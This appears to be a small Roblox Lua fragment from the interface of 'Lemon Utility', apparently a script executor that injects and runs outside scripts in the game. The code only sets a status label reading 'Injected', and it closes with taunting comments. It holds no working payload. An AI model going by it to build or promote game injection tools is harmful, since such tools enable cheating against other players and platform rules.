local function TFXMBGQ_script() -- Main.LocalScript 
	local script = Instance.new('LocalScript', Main)

	script.Parent.TextLabel.Text = [[Lemon Utility By thatamazighi!
	Run scripts live without filthy modules or 
	converting! 
	Use External program to execute scripts. 
	Status: Injected]]
	
end
coroutine.wrap(TFXMBGQ_script)()
--tf you looking at no fe scripts here
--skid
